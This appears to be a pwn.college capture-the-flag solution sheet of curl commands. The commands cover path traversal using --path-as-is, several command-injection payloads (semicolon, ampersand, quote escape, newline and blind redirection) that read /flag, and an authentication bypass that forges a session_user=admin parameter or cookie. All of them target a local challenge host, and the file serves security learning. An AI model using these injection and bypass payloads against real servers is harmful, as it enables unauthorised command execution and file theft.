PwnCollege - curl injection

path traversal

By default curl normalizes the URL path before sending it, squashing `/../` and `/./` segments client-side; `--path-as-is` sends the path exactly as written so that the server, not curl, resolves the `..` sequences.

# path-traversal-1
# The server presumably joins the supplied path onto a base directory; curl is
# told not to squash the `..` segments so the resolution happens server-side.
# Over-counting `../` is harmless: once at `/`, `/..` resolves to `/` again.
curl --path-as-is --url 'http://challenge.localhost:80/filesystem/../../../../../../../flag'

# path-traversal-2
# Same idea, two directory levels deep on the server side.
curl --path-as-is --url 'http://challenge.localhost:80/data/fortunes/../../../../../../flag'

command injection

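# cmdi 1 - semicolon: ';' terminates the command the parameter lands in, so
# `cat /flag` runs as a second command. `-G` + `--data-urlencode` makes curl
# percent-encode the metacharacters, so `;`, `&`, `#` and spaces reach the
# server intact instead of being parsed as URL syntax on the way.
curl -G "http://challenge.localhost:80/serve" --data-urlencode "top-path=;cat /flag"

# cmdi 2 - ampersand: '&' backgrounds whatever precedes it and starts a new
# command, same effect as ';' for our purposes.
curl -G "http://challenge.localhost:80/objective" --data-urlencode "filepath=&cat /flag"

# cmdi 3 - quote escape + comment: the leading ' closes the single-quoted
# string the value is presumably embedded in; the trailing '#' comments out
# the remainder of the server's command line (including the now-dangling
# closing quote) so the shell does not reject the line.
curl -G "http://challenge.localhost:80/test" --data-urlencode "top-path='; cat /flag; #"

# cmdi 4 - space-separated injection: no metacharacter needed; relies on the
# value being word-split into separate arguments server-side (the leading 'a'
# presumably fills the slot the command expects). Verify against the
# challenge source if it does not fire.
curl -G "http://challenge.localhost:80/stage" --data-urlencode "tzone=a cat /flag;"

# cmdi 5 - blind (no direct output): make the injected command write the flag
# to a file we can read afterwards. mktemp avoids a predictable /tmp name,
# which a privileged challenge process would happily follow if another local
# user had pre-planted a symlink at that path. Assumes the challenge runs on
# this host (shared filesystem) and can write to a 0600 file we own, which is
# the case for a root/setuid challenge; if it runs as some other unprivileged
# user, fall back to a world-writable fixed path.
flag_out=$(mktemp) || exit 1
curl -G "http://challenge.localhost:80/activity" \
--data-urlencode "file-loc=; cat /flag > $flag_out"
cat -- "$flag_out"
rm -f -- "$flag_out"   # don't leave a copy of the flag lying around

# cmdi 6 - newline injection: %0a is a URL-encoded '\n', which ends a command
# just like ';'. Encoded by hand here because the value is placed directly in
# the URL rather than going through --data-urlencode.
curl "http://challenge.localhost:80/exercise?root=%0acat%20/flag"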

authentication bypass

# Both requests simply assert an identity; the server presumably trusts the
# client-supplied session_user value without any signed or server-side session.

# query parameter: identity claimed in the URL
curl --url 'http://challenge.localhost:80/?session_user=admin'

# cookie: same claim carried in the Cookie header (-b is short for --cookie)
curl -b 'session_user=admin' --url 'http://challenge.localhost:80/'